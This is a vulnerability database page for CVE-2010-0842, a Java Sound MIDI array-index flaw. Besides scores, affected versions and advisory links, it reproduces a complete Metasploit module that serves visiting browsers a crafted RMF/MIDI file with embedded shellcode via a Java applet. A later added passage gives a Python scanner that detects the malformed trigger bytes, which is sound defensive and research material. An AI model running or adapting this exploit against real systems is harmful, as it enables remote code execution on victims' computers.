CVE-2010-0842 : Detail

EPSS: 95.04%
Attack vector: Network
Published: 2010-04-01 14h00 +00:00
Last updated: 2018-10-10 16h57 +00:00

CVE Description

Unspecified vulnerability in the Sound component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the March 2010 CPU. Oracle has not commented on claims from a reliable researcher that this is an uncontrolled array index that allows remote attackers to execute arbitrary code via a MIDI file with a crafted MixerSequencer object, related to the GM_Song structure.

CVE Information

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-Other	No information.	

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	7.5	HIGH	AV:N/AC:L/Au:N/C:P/I:P/A:P	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile is therefore the way to compare the EPSS score of one CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID: 18485

Publication date: 2012-02-15 23h00 +00:00
Author: Metasploit
EDB Verified: Yes

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Java MixerSequencer Object GM_Song Structure Handling Vulnerability",
      'Description'    => %q{
          This module exploits a flaw within the handling of MixerSequencer objects
        in Java 6u18 and before. Exploitation is done by supplying a specially crafted
        MIDI file within an RMF file. When the MixerSequencer object is used to play
        the file, the GM_Song structure is populated with a function pointer provided
        by a SONG block in the RMF. A Midi block that contains a MIDI with a specially
        crafted controller event is used to trigger the vulnerability. When triggering
        the vulnerability "ebx" points to a fake event in the MIDI file which stores
        the shellcode. A "jmp ebx" from msvcr71.dll is used to make the exploit
        reliable over Java updates.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Peter Vreugdenhil', # Vulnerability Discovery and exploit
          'juan vazquez',      # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2010-0842' ],
          [ 'OSVDB', '63493' ],
          [ 'BID', '39077' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-060/' ],
          [ 'URL', 'http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/' ]
        ],
      'Payload'        =>
        {
          'Space' => 8000,
        },
      'DefaultOptions' =>
        {
          'EXITFUNC'             => "process",
          'InitialAutoRunScript' => 'migrate -f',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            # Tested successfully on:
            # Windows XP SP3 / IE 6 / Java 6u18
            # Windows XP SP3 / IE 7 / Java 6u18
            # Windows XP SP3 / IE 8 / Java 6u18
            # Windows XP SP3 / Firefox 7.0.1 / Java 6u18
            # Windows XP SP3 / IE 8 / Java 6u17
            # Windows XP SP3 / Firefox 7.0.1 / Java 6u17
            # Windows 7 / IE 8 / Java 6u18
            'Windows / Java 6 <=u18',
            {
              'Ret' => 0x7C35A78D # jmp ebx # msvcr71.dll
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Mar 30 2010",
      'DefaultTarget'  => 0))
  end

  def get_rmf
    rmf_header = ""
    rmf_header << "IREZ"             # RMFHeaderMagic
    rmf_header << "\x00\x00\x00\x01" # RMFVersionNumber
    rmf_header << "\x00\x00\x00\x02" # NumberOfRMFBlocks

    song_block = ""
    song_block << "\x00\x00\x00\x65"                 # OffsetToNextBlock
    song_block << "SONG"                             # BlockType
    song_block << [target.ret].pack("N")             # BlockID
    song_block << "\x00"                             # BlockName
    song_block << "\x00\x00\x00\x47"                 # BlockDataSize
    song_block << "\x7F\xFF\x00\x01\x00\x00\x01\x01" # BlockData
    song_block << "\x00\x00\x00\x04\x00\x1C\x00\x08" # BlockData
    song_block << "\x00\x7F\x00\x00\x00\x00\x00\x00" # BlockData
    song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData
    song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData
    song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData
    song_block << "\x00\x01\x54\x49\x54\x4C\x9F\xB1" # BlockData
    song_block << "\xB5\x0D\x0A\x7E\xFB\x70\x9C\x86" # BlockData
    song_block << "\xFE\xB0\x35\x93\xE2\x5E\xDE\xF7" # BlockData

    midi = ""
    # HEADERCHUNK Header
    midi << "MThd"             # Header
    midi << "\x00\x00\x00\x06" # Chunk size
    midi << "\x00\x01"         # Format Type
    midi << "\x00\x01"         # Number of tracks
    midi << "\x00\x08"         # Time division
    # TRACKCHUNK header
    midi << "MTrk"             # Header
    midi << "\x00\x00\x24\xd7" # Length
    midi << "\x00\xb0\x80\x00" # Controller Event # Triggers the vulnerability
    # Fake Midi Meta event - Shellcode
    midi << "\x38"     # Variable length delta time
    midi << "\xff"     # Midi meta event
    midi << "\x02"     # Meta event type 02 => Copyright notice
    midi << "\xc9\x50" # Variable Meta Event Length
    midi << payload.encoded
    midi << rand_text(9123 - payload.encoded.length)

    midi_block = "\x00\x00\x25\x60"  # OffsetToNextBlock
    midi_block << "Midi"             # BlockType
    midi_block << "\x00\x00\x7f\xff" # BlockID
    midi_block << "\x00"             # BlockName
    midi_block << "\x00\x00\x24\xed" # BlockDataSize
    midi_block << midi               # BlockData

    rmf = ""
    rmf << rmf_header
    rmf << song_block
    rmf << midi_block

    rmf_name = "#{rand_text_alpha(rand(5) + 3)}.rmf"
    return rmf_name, rmf
  end

  def get_jar
    files = [
      [ "MyController.class" ],
      [ "MixerMidiApplet.class" ],
      [ "META-INF", "services", "javax.sound.midi.spi.MidiDeviceProvider" ]
    ]

    jar = Rex::Zip::Jar.new
    jar.add_file("META-INF/", "")
    jar.add_file("META-INF/services/", "")
    jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-0842"))
    jar.build_manifest

    jar_name = "#{rand_text_alpha(rand(5) + 3)}.jar"
    return jar_name, jar
  end

  def on_request_uri(cli, request)
    if request.uri =~ /\.jar$/i
      print_status("Sending JAR file to #{cli.peerhost}:#{cli.peerport}...")
      send_response(cli, @jar.pack, {'Content-Type'=>'application/octet-stream'})
      return
    end

    if request.uri =~ /\.rmf$/i
      print_status("Sending RMF file to #{cli.peerhost}:#{cli.peerport}...")
      send_response(cli, @rmf, {'Content-Type'=>'application/octet-stream'})
      return
    end

    base_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
    rmf_uri  = base_uri + "/#{@rmf_name}"
    jar_uri  = base_uri + "/#{@jar_name}"

    html = %Q|
    <html>
    <head>
    </head>
    <body>
    <applet code="MixerMidiApplet.class" archive="#{jar_uri}" width=350 height=200>
    <param name="midifile" valuetype="ref" value="#{rmf_uri}">
    </applet>
    </body>
    </html>
    |

    html = html.gsub(/^\t\t/, '')

    print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

  def exploit
    @jar_name, @jar = get_jar
    @rmf_name, @rmf = get_rmf
    super
  end
end
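The CVE description above calls the bug an uncontrolled array index reached through a crafted controller event, and the module above shows the exact bytes: an RMF ("IREZ") container whose Midi block carries a control change with controller byte 0x80, followed by a copyright meta event that holds the payload. The scanner below is an added example, not code from this page, from the ZDI advisory or from the Metasploit module. It walks the RMF block layout that the module's get_rmf builds (that layout is taken from the module, not from an RMF specification), parses the embedded Standard MIDI File and reports any channel-message data byte with the high bit set, which is the 7-bit invariant the trigger event violates; whether that byte is the exact index the Sun code fails to bound is not stated on the page, so the check is on the format invariant rather than on a claimed root cause. META_LIMIT, TRIGGER_EVENTS, BENIGN_EVENTS and build_sample_rmf are constructed here for the example; the SONG block ID 0x7C35A78D in the crafted sample is the module's return address, reproduced because the module carries it in that field, and zeros stand in for the shellcode.

```python
import struct
# Added example (not the page's or Metasploit's code): a scanner for RMF ("IREZ")
# containers in the layout get_rmf above builds.  Sample input is constructed.
META_LIMIT = 4096  # heuristic: report meta events larger than this

def read_vlq(buf, pos):
    # MIDI variable-length quantity at pos -> (value, next_pos)
    value = 0
    for b in buf[pos:pos + 4]:
        value, pos = (value << 7) | (b & 0x7F), pos + 1
        if not b & 0x80:
            return value, pos
    raise ValueError("bad variable-length quantity")

def parse_rmf(buf):
    # Block: offset(4) type(4) id(4) name(length-prefixed) size(4) data, big-endian.
    # Sizes are clamped to the buffer so an overstated size cannot walk past the end.
    if buf[:4] != b"IREZ":
        raise ValueError("not an RMF container")
    _version, nblocks = struct.unpack_from(">II", buf, 4)
    pos = 12
    for _ in range(nblocks):
        if pos + 13 > len(buf):
            break
        _next, btype, bid = struct.unpack_from(">I4sI", buf, pos)
        pos += 13 + buf[pos + 12]                   # fixed header plus name
        if pos + 4 > len(buf):
            break
        (size,) = struct.unpack_from(">I", buf, pos)
        data = buf[pos + 4:pos + 4 + size]
        pos += 4 + len(data)
        yield btype, bid, data

def scan_track(track):
    # Every data byte of a channel message must be 0..127; a control change whose
    # controller byte has the high bit set is the shape of the trigger (00 B0 80 00).
    findings, pos, status = [], 0, None
    while pos < len(track):
        _delta, pos = read_vlq(track, pos)
        if track[pos] & 0x80:                       # new status byte, else running status
            status, pos = track[pos], pos + 1
        if status is None:
            raise ValueError("data byte before any status byte")
        if status == 0xFF:                          # meta event: type, length, payload
            mtype, (length, pos) = track[pos], read_vlq(track, pos + 1)
            if length > META_LIMIT:
                findings.append(f"meta event type {mtype:#04x} carries {length} bytes")
            pos += length
        elif status in (0xF0, 0xF7):                # sysex: length, payload
            length, pos = read_vlq(track, pos)
            pos += length
        else:                                       # channel message: 1 or 2 data bytes
            ndata = 1 if (status & 0xF0) in (0xC0, 0xD0) else 2
            for i, d in enumerate(track[pos:pos + ndata]):
                if d & 0x80:
                    what = "controller number" if (status & 0xF0) == 0xB0 and i == 0 else "data byte"
                    findings.append(f"{what} {d:#04x} out of 0..127 in status "
                                    f"{status:#04x} event at track offset {pos + i}")
            pos += ndata
    return findings

def scan_midi(midi):
    if midi[:4] != b"MThd":
        return ["missing MThd header"]
    hdr_len, _fmt, ntracks, _div = struct.unpack_from(">IHHH", midi, 4)
    findings, pos = [], 8 + hdr_len
    for _ in range(ntracks):
        if midi[pos:pos + 4] != b"MTrk":
            return findings + [f"expected MTrk at offset {pos}"]
        (length,) = struct.unpack_from(">I", midi, pos + 4)
        findings += scan_track(midi[pos + 8:pos + 8 + length])   # clamped to the data
        pos += 8 + length
    return findings

def scan_rmf(buf):
    report = {"song_block_ids": [], "issues": []}
    for btype, bid, data in parse_rmf(buf):
        if btype == b"SONG":
            report["song_block_ids"].append(bid)
        elif btype == b"Midi":
            try:
                report["issues"] += scan_midi(data)
            except (ValueError, IndexError, struct.error) as exc:
                report["issues"].append(f"malformed MIDI: {exc}")
    return report

def build_block(btype, bid, data):
    body = btype + struct.pack(">I", bid) + b"\x00" + struct.pack(">I", len(data)) + data
    return struct.pack(">I", 4 + len(body)) + body
# Constructed track bodies.  TRIGGER_EVENTS copies the module's event bytes: controller
# 0x80, then a copyright meta event whose declared length 0xc9 0x50 = 9424 exceeds the
# 9123 bytes that follow (zeros stand in for shellcode).  BENIGN_EVENTS is well-formed.
TRIGGER_EVENTS = b"\x00\xb0\x80\x00" + b"\x38\xff\x02\xc9\x50" + bytes(9123)
BENIGN_EVENTS = b"\x00\xb0\x07\x40" + b"\x00\xff\x2f\x00"      # CC volume, end of track

def build_sample_rmf(events, song_id=0x7C35A78D):
    midi = b"MThd" + struct.pack(">IHHH", 6, 1, 1, 8)
    midi += b"MTrk" + struct.pack(">I", len(events)) + events
    song = build_block(b"SONG", song_id, b"\x7F\xFF\x00\x01\x00\x00\x01\x01")
    return b"IREZ" + struct.pack(">II", 1, 2) + song + build_block(b"Midi", 0x7FFF, midi)
```

scan_rmf on the crafted sample returns the SONG block ID (reported because the module parks its jmp-ebx address in that field) and two issues: the controller number 0x80 outside 0..127, and a meta event whose declared 9424-byte length overruns the bytes present. The benign sample returns no issues. Length fields are clamped to the buffer instead of trusted, since the module's own BlockDataSize and MTrk length fields do not match the bytes it emits; a parser that indexed a 128-entry controller table with the raw byte, or allocated from the declared meta length, would be doing exactly what this check refuses to do.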

Products Mentioned

Configuration 0

Sun>>Jre >> Version To (including) 1.6.0

Sun>>Jre >> Version 1.6.0

Configuration 0

Sun>>Jdk >> Version To (including) 1.6.0

Sun>>Jdk >> Version 1.6.0

Configuration 0

Sun>>Jdk >> Version To (including) 1.5.0

Sun>>Jdk >> Version 1.5.0

Configuration 0

Sun>>Sdk >> Version To (including) 1.4.2_25

Sun>>Sdk >> Version 1.4.2

Sun>>Sdk >> Version 1.4.2_1

Sun>>Sdk >> Version 1.4.2_02

Sun>>Sdk >> Version 1.4.2_3

Sun>>Sdk >> Version 1.4.2_4

Sun>>Sdk >> Version 1.4.2_5

Sun>>Sdk >> Version 1.4.2_6

Sun>>Sdk >> Version 1.4.2_7

Sun>>Sdk >> Version 1.4.2_8

Sun>>Sdk >> Version 1.4.2_9

Sun>>Sdk >> Version 1.4.2_10

Sun>>Sdk >> Version 1.4.2_11

Sun>>Sdk >> Version 1.4.2_12

Sun>>Sdk >> Version 1.4.2_13

Sun>>Sdk >> Version 1.4.2_14

Sun>>Sdk >> Version 1.4.2_15

Sun>>Sdk >> Version 1.4.2_16

Sun>>Sdk >> Version 1.4.2_17

Sun>>Sdk >> Version 1.4.2_18

Sun>>Sdk >> Version 1.4.2_19

Sun>>Sdk >> Version 1.4.2_20

Sun>>Sdk >> Version 1.4.2_21

Sun>>Sdk >> Version 1.4.2_22

Sun>>Sdk >> Version 1.4.2_23

Sun>>Sdk >> Version 1.4.2_24

Configuration 0

Sun>>Jre >> Version To (including) 1.5.0

Sun>>Jre >> Version 1.5.0

Configuration 0

Sun>>Jre >> Version To (including) 1.4.2_25

Sun>>Jre >> Version 1.4.2

Sun>>Jre >> Version 1.4.2_1

Sun>>Jre >> Version 1.4.2_2

Sun>>Jre >> Version 1.4.2_3

Sun>>Jre >> Version 1.4.2_4

Sun>>Jre >> Version 1.4.2_5

Sun>>Jre >> Version 1.4.2_6

Sun>>Jre >> Version 1.4.2_7

Sun>>Jre >> Version 1.4.2_8

Sun>>Jre >> Version 1.4.2_9

Sun>>Jre >> Version 1.4.2_10

Sun>>Jre >> Version 1.4.2_11

Sun>>Jre >> Version 1.4.2_12

Sun>>Jre >> Version 1.4.2_13

Sun>>Jre >> Version 1.4.2_14

Sun>>Jre >> Version 1.4.2_15

Sun>>Jre >> Version 1.4.2_16

Sun>>Jre >> Version 1.4.2_17

Sun>>Jre >> Version 1.4.2_18

Sun>>Jre >> Version 1.4.2_19

Sun>>Jre >> Version 1.4.2_20

Sun>>Jre >> Version 1.4.2_21

Sun>>Jre >> Version 1.4.2_22

Sun>>Jre >> Version 1.4.2_23

Sun>>Jre >> Version 1.4.2_24

Configuration 0

Sun>>Jdk >> Version To (including) 1.3.1_27

Sun>>Jdk >> Version 1.3.0

Sun>>Jdk >> Version 1.3.0_01

Sun>>Jdk >> Version 1.3.0_02

Sun>>Jdk >> Version 1.3.0_03

Sun>>Jdk >> Version 1.3.0_04

Sun>>Jdk >> Version 1.3.0_05

Sun>>Jdk >> Version 1.3.1

Sun>>Jdk >> Version 1.3.1_01

Sun>>Jdk >> Version 1.3.1_01a

Sun>>Jdk >> Version 1.3.1_02

Sun>>Jdk >> Version 1.3.1_03

Sun>>Jdk >> Version 1.3.1_04

Sun>>Jdk >> Version 1.3.1_05

Sun>>Jdk >> Version 1.3.1_06

Sun>>Jdk >> Version 1.3.1_07

Sun>>Jdk >> Version 1.3.1_08

Sun>>Jdk >> Version 1.3.1_09

Sun>>Jdk >> Version 1.3.1_10

Sun>>Jdk >> Version 1.3.1_11

Sun>>Jdk >> Version 1.3.1_12

Sun>>Jdk >> Version 1.3.1_13

Sun>>Jdk >> Version 1.3.1_14

Sun>>Jdk >> Version 1.3.1_15

Sun>>Jdk >> Version 1.3.1_16

Sun>>Jdk >> Version 1.3.1_17

Sun>>Jdk >> Version 1.3.1_18

Sun>>Jdk >> Version 1.3.1_19

Sun>>Jdk >> Version 1.3.1_20

Sun>>Jdk >> Version 1.3.1_21

Sun>>Jdk >> Version 1.3.1_22

Sun>>Jdk >> Version 1.3.1_23

Sun>>Jdk >> Version 1.3.1_24

Sun>>Jdk >> Version 1.3.1_25

Sun>>Jdk >> Version 1.3.1_26

Configuration 0

Sun>>Jre >> Version To (including) 1.3.1_27

Sun>>Jre >> Version 1.3.0

Sun>>Jre >> Version 1.3.1

Sun>>Jre >> Version 1.3.1_2

Sun>>Jre >> Version 1.3.1_03

Sun>>Jre >> Version 1.3.1_04

Sun>>Jre >> Version 1.3.1_05

Sun>>Jre >> Version 1.3.1_06

Sun>>Jre >> Version 1.3.1_07

Sun>>Jre >> Version 1.3.1_08

Sun>>Jre >> Version 1.3.1_09

Sun>>Jre >> Version 1.3.1_10

Sun>>Jre >> Version 1.3.1_11

Sun>>Jre >> Version 1.3.1_12

Sun>>Jre >> Version 1.3.1_13

Sun>>Jre >> Version 1.3.1_14

Sun>>Jre >> Version 1.3.1_15

Sun>>Jre >> Version 1.3.1_16

Sun>>Jre >> Version 1.3.1_17

Sun>>Jre >> Version 1.3.1_18

Sun>>Jre >> Version 1.3.1_19

Sun>>Jre >> Version 1.3.1_20

Sun>>Jre >> Version 1.3.1_21

Sun>>Jre >> Version 1.3.1_22

Sun>>Jre >> Version 1.3.1_23

Sun>>Jre >> Version 1.3.1_24

Sun>>Jre >> Version 1.3.1_25

Sun>>Jre >> Version 1.3.1_26

Configuration 0

Sun>>Sdk >> Version To (including) 1.3.1_27

Sun>>Sdk >> Version 1.3.0

Sun>>Sdk >> Version 1.3.0_01

Sun>>Sdk >> Version 1.3.0_02

Sun>>Sdk >> Version 1.3.0_03

Sun>>Sdk >> Version 1.3.0_04

Sun>>Sdk >> Version 1.3.0_05

Sun>>Sdk >> Version 1.3.1

Sun>>Sdk >> Version 1.3.1_01

Sun>>Sdk >> Version 1.3.1_01a

Sun>>Sdk >> Version 1.3.1_02

Sun>>Sdk >> Version 1.3.1_03

Sun>>Sdk >> Version 1.3.1_04

Sun>>Sdk >> Version 1.3.1_05

Sun>>Sdk >> Version 1.3.1_06

Sun>>Sdk >> Version 1.3.1_07

Sun>>Sdk >> Version 1.3.1_08

Sun>>Sdk >> Version 1.3.1_09

Sun>>Sdk >> Version 1.3.1_10

Sun>>Sdk >> Version 1.3.1_11

Sun>>Sdk >> Version 1.3.1_12

Sun>>Sdk >> Version 1.3.1_13

Sun>>Sdk >> Version 1.3.1_14

Sun>>Sdk >> Version 1.3.1_15

Sun>>Sdk >> Version 1.3.1_16

Sun>>Sdk >> Version 1.3.1_17

Sun>>Sdk >> Version 1.3.1_18

Sun>>Sdk >> Version 1.3.1_19

Sun>>Sdk >> Version 1.3.1_20

Sun>>Sdk >> Version 1.3.1_21

Sun>>Sdk >> Version 1.3.1_22

Sun>>Sdk >> Version 1.3.1_23

Sun>>Sdk >> Version 1.3.1_24

Sun>>Sdk >> Version 1.3.1_25

Sun>>Sdk >> Version 1.3.1_26

References

http://marc.info/?l=bugtraq&m=134254866602253&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/39317
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0383.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/40545
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2010/1454
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/39819
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0338.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.vupen.com/english/advisories/2010/1793
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/43308
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=127557596201693&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.securityfocus.com/bid/39077
Tags : vdb-entry, x_refsource_BID
http://support.apple.com/kb/HT4170
Tags : x_refsource_CONFIRM
http://www.vupen.com/english/advisories/2010/1523
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/39659
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0471.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2010-0337.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2010-0489.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/40211
Tags : third-party-advisory, x_refsource_SECUNIA
http://support.apple.com/kb/HT4171
Tags : x_refsource_CONFIRM
http://www.vupen.com/english/advisories/2010/1191
Tags : vdb-entry, x_refsource_VUPEN